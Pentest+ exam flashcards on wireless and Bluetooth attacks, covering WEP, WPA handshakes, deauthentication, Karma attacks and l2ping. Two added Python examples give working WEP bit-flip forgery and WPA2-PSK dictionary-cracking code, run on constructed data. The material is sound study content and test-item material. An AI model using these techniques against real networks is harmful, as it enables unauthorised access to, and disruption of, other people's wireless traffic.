CompTIA Pentest+ Chapter 8 Questions Flashcards
WEP uses an encryption algorithm called RC4; which was developed by Ronald Rivest.
RC4 is a \_\_\_\_ cipher: a symmetric-key cipher that expands a short key into a long pseudo-random keystream, which is XORed with the plaintext. A.Stream B.Asymmetric C.Block D.Secret
A.Stream
Explanation:
RC4 produces its keystream one byte at a time and never operates on fixed-size blocks, so it is a stream cipher, not a block cipher. WEP's weakness is not that RC4 is a stream cipher but that the 24-bit IV is prepended to the shared key, so keystreams repeat quickly and related-key attacks (FMS, PTW) recover the key.
CRC-32 is an algorithm used to verify the integrity of network packets in WEP (the 4-byte ICV appended to each frame) and is also found in many other applications, such as the Ethernet frame check sequence and ZIP archives, to detect accidental changes to data.
CRC-32 is based on the original cyclic redundancy check and is not recommended for verifying the integrity of modern-day technology due to the fact that ______ (Select the best answer)
A.It is an older form of integrity checking software that has multiple vulnerabilities
B.CRC-32 is a variant of CRC, which is based on non cryptographic algorithm that offers very little assurance with regard to data manipulation
C.CRC is a variant of CRC-32, which is based on a cryptographic algorithm that offers very little assurance with regard to data manipulation
D. It is an older form of integrity checking software that has few to no vulnerabilities
B.CRC-32 is a variant of CRC, which is based on non cryptographic algorithm that offers very little assurance with regard to data manipulation
Explanation:
CRC-32 is a non-cryptographic checksum based on the cyclic redundancy check (CRC).
It is designed to catch accidental corruption, not deliberate tampering: the function is linear, so anyone who flips bits in a message can compute exactly how the checksum changes and adjust it, without knowing the message or any key. In WEP this is fatal because the ICV is encrypted with the same XOR keystream as the data, so an attacker can patch the encrypted ICV as well (the WEP bit-flipping attack).
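The bit-flipping attack the explanation describes, as an added example (not part of the original flashcard set): a WEP-style frame is built as plaintext plus CRC-32 ICV, XORed with a keystream, and the attacker then changes the plaintext and fixes the encrypted ICV using only the linearity of CRC-32. The keystream, the payload text and the ARP-sized frame are constructed for the demo; `os.urandom` stands in for RC4 output because the attack does not depend on RC4 at all.

```python
import os
import zlib


def crc32(data: bytes) -> int:
    """Standard CRC-32 (IEEE 802.3 / zlib), the function WEP uses for its ICV."""
    return zlib.crc32(data) & 0xFFFFFFFF


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_style_protect(plaintext: bytes, keystream: bytes) -> bytes:
    """Append the CRC-32 ICV and XOR everything with the keystream.

    The keystream is a constructed stand-in for RC4 output: the attack below
    depends only on XOR encryption and CRC linearity, not on RC4 itself.
    """
    body = plaintext + crc32(plaintext).to_bytes(4, "big")
    return xor(body, keystream[: len(body)])


def wep_style_unprotect(ciphertext: bytes, keystream: bytes) -> bytes:
    """Decrypt and enforce the ICV the way a WEP receiver does."""
    body = xor(ciphertext, keystream[: len(ciphertext)])
    data, icv = body[:-4], int.from_bytes(body[-4:], "big")
    if crc32(data) != icv:
        raise ValueError("ICV check failed")
    return data


def bitflip_forge(ciphertext: bytes, delta: bytes) -> bytes:
    """Flip the plaintext bits in `delta` and fix the encrypted ICV, without the key.

    For equal-length inputs CRC-32 is affine: crc(m ^ d) = crc(m) ^ crc(d) ^ crc(0...0).
    Because the ICV is XOR-encrypted with the same keystream as the data, XORing the
    encrypted ICV with crc(d) ^ crc(0...0) yields the encryption of the new, valid ICV.
    """
    n = len(ciphertext) - 4
    if len(delta) != n:
        raise ValueError("delta must cover the whole payload")
    icv_delta = crc32(delta) ^ crc32(bytes(n))
    return xor(ciphertext, delta + icv_delta.to_bytes(4, "big"))


def demo() -> bytes:
    """Forge 'PAY 0010' into 'PAY 9910' and get the frame past the receiver's ICV check."""
    keystream = os.urandom(64)                 # constructed; the attacker never sees it
    plaintext = b"PAY 0010 TO ALICE"           # constructed sample payload
    wanted = b"PAY 9910 TO ALICE"
    captured = wep_style_protect(plaintext, keystream)
    # The attacker only needs to know which bits to flip (here: the amount field),
    # not the key or the rest of the plaintext.
    delta = xor(plaintext, wanted)
    forged = bitflip_forge(captured, delta)
    return wep_style_unprotect(forged, keystream)   # receiver accepts the forgery


def naive_flip_is_rejected() -> bool:
    """Flipping data bits without adjusting the ICV is caught, which is all CRC buys you."""
    keystream = os.urandom(64)
    plaintext = b"PAY 0010 TO ALICE"
    captured = wep_style_protect(plaintext, keystream)
    delta = xor(plaintext, b"PAY 9910 TO ALICE") + bytes(4)   # leave the ICV alone
    try:
        wep_style_unprotect(xor(captured, delta), keystream)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(demo())
```

A keyed MAC (HMAC, or the CCMP MIC in WPA2) does not have this property: changing a bit of the message changes the tag unpredictably without the key, which is exactly the assurance a CRC cannot give.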
In order to crack WEP, you need to capture enough frames carrying distinct 24-bit initialization vectors (IVs) to recover the secret key; the IV is transmitted in the clear and prepended to the key to form the RC4 key.
WEP secret keys come in two different lengths.
10-digit (hexadecimal) keys are 64 bits in length: 40 secret bits plus the 24-bit IV.
How many digits are in a key length of 128-bits? A.24 B.16 C.26 D.28
C.26
Explanation:
A 64-bit WEP key is 10 hex digits (40 secret bits + 24-bit IV); a 128-bit WEP key is 26 hex digits (104 secret bits + 24-bit IV). The 24-bit IV is why even the "128-bit" key exhausts its IV space after about 16.7 million frames.
With WPA-PSK, the wireless client and the access point both know the pre-shared key before the client joins the network.
During the four-way handshake, each side uses the PSK to derive the pairwise master key (PMK) and from it a _____, whose sub-keys are used to encrypt and authenticate the packets sent between the two hosts.
What is this type of key called? A.Pre-shared key B.Pairwise share key C.Pairwise transfer key D.Pairwise transient key
D.Pairwise transient key
Explanation:
The PMK is never sent over the network; instead the pairwise transient key (PTK) is derived from the PMK together with both MAC addresses and both nonces (ANonce, SNonce) exchanged in the handshake, and its sub-keys (KCK, KEK, TK) protect the unicast traffic.
During a pentest, your team identifies an access point that is broadcasting the SSID value and is protected with only WEP encryption.
Your team attempts to use aireplay-ng to capture and replay an ARP request over the network; however, the tool has not seen any ARP packets to replay.
This is most likely because no clients are generating traffic on the network.
In order to speed up the cracking process, what could you recommend your team to do?
A.Use a MiTM tool in order to attack clients actively listening on the network
B.Use the ping command and ping nonexistent hosts on the network
C.Try and telnet or remotely log in to other hosts over the network
D.Navigate to web pages in your browser in order to generate some network traffic
B.Use the ping command and ping nonexistent hosts on the network
Explanation:
Repeatedly pinging hosts that do not exist makes a station broadcast ARP requests that are never answered, so they keep being re-sent. The AP relays each broadcast as a new WEP frame with a fresh IV, which gives aireplay-ng ARP packets to replay and airodump-ng IVs to collect, speeding up the crack.
PBKDF2 is used to calculate the PMK using the following values, except for which one? A.The password/passphrase (PSK) B.The access point SSID or ESSID C.The length of the SSID or ESSID D.The host name of the device
D.The host name of the device
Explanation:
The PMK is derived from all of the options except the device host name: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 256 bits). The SSID acts as the salt, so its bytes and length both feed the derivation.
The two constants the question leaves out are 4096 (number of hashing iterations) and 256 (length of the PMK in bits).
In order to crack a WPA or WPA2 PSK you need to capture the four-way handshake (the ANonce from message 1 and the SNonce plus MIC from message 2 are enough), because the MIC is the only captured value the attacker can test candidate passphrases against.
During a pentest, your team identifies multiple clients on the target network.
What is the best way to capture the handshake?
A.Deauthenticate one of the clients
B.Send multiple ARP requests over the network
C.Deauthenticate all the clients on the network
D.Send multiple ARP requests to the access point
A.Deauthenticate one of the clients
Explanation:
A deauthentication frame tells the client to disassociate from the wireless network; when it reconnects, it performs a fresh four-way handshake that can be captured.
Deauthenticating one client at a time until you capture a handshake is the recommended approach: it keeps the engagement quiet and causes the least disruption to the customer's users, whereas deauthenticating every client is noisy and effectively a denial of service.
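The full offline check that a captured handshake enables, as an added example that ties together the PMK (PBKDF2), PTK and MIC questions above; it is not code from the original flashcard set or from any cracking tool. Everything in the "capture" (SSID, MAC addresses, nonces, the EAPOL-Key message 2 bytes and the real passphrase) is constructed for the demo; the PMK test vector for "password"/"IEEE" is the published IEEE 802.11 Annex test vector.

```python
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes,
               anonce: bytes, snonce: bytes, nbytes: int = 48) -> bytes:
    """PTK = PRF(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces)).

    48 bytes suffice for CCMP: KCK = PTK[0:16] (signs the handshake), KEK = PTK[16:32]
    (wraps the GTK), TK = PTK[32:48] (encrypts unicast data).
    """
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, nbytes)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2/CCMP MIC: HMAC-SHA1 over the EAPOL-Key frame (MIC field zeroed), truncated to 16 bytes.
    WPA/TKIP uses HMAC-MD5 instead."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_psk(wordlist, ssid, ap_mac, client_mac, anonce, snonce, eapol_frame, captured_mic):
    """Offline dictionary attack: recompute the MIC for each candidate and compare."""
    for candidate in wordlist:
        kck = derive_ptk(derive_pmk(candidate, ssid), ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return candidate
    return None


# Constructed "capture": every value below is made up for the demo, not from a real network.
SSID = "LabNet"
AP_MAC = bytes.fromhex("020000000001")
CLIENT_MAC = bytes.fromhex("020000000002")
ANONCE = hashlib.sha256(b"anonce").digest()
SNONCE = hashlib.sha256(b"snonce").digest()
# Stand-in for EAPOL-Key message 2 with its 16-byte MIC field zeroed. The MIC is computed over
# exactly these bytes, so the internal field layout does not matter for the check.
EAPOL_MSG2 = (b"\x01\x03\x00\x75\x02\x01\x0a\x00" + bytes(8) + SNONCE
              + bytes(8 + 8 + 8 + 16) + b"\x00\x00")


def captured_mic_for(passphrase: str) -> bytes:
    """What the real client would have put in message 2 for the constructed handshake."""
    kck = derive_ptk(derive_pmk(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, EAPOL_MSG2)


def demo():
    mic = captured_mic_for("correct horse battery")   # the network's real PSK (constructed)
    wordlist = ["password", "letmein", "correct horse battery", "Tr0ub4dor&3"]
    return crack_psk(wordlist, SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, EAPOL_MSG2, mic)


if __name__ == "__main__":
    print(derive_pmk("password", "IEEE").hex())   # IEEE 802.11 test vector: f42c6fc5...
    print(demo())
```

The 4096 PBKDF2 iterations per candidate are the whole cost of the attack, which is why aircrack-ng and hashcat spend their time there and why a long, non-dictionary passphrase is the only PSK defence.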
The evil twin access point is a type of attack used to duplicate the existence of a legitimate access point in order to entice victims to connect for the purpose of targeting end-user devices or communications.
Another attack answers the probe requests clients send for their remembered networks, imitating every access point they ask for. What is this called? A.Karma attack B.Replay attack C.AP relay attack D.Social engineering attack
A.Karma Attack
Explanation:
A Karma attack responds to every probe request it hears, claiming to be whichever SSID the client is looking for, so any device probing for a remembered network will associate with the attacker, which greatly increases the chance of exploitation.
This command can be used to execute a type of "ping of death" against Bluetooth devices. A.L2PP B.L2TP C.L2PING D.LPING
C.L2PING
Explanation:
l2ping sends L2CAP echo requests to a Bluetooth device addressed by its MAC (BD_ADDR), which makes it useful both for confirming a device is present and, with flooding and oversized packets, for DoS attacks against the target.
All of the following are layers in the Bluetooth protocol stack except for which one? A.LMP B.SDP C.L2CAP D.TC2 E.RFCOMM
D.TC2
Explanation:
TC2 is not a valid layer of the Bluetooth protocol stack.
TCS (Telephony Control protocol Specification) is, however, a valid layer and is used for call control functions on the mobile device; LMP (link management), L2CAP (logical link control and adaptation), SDP (service discovery) and RFCOMM (serial port emulation) are the other real layers listed.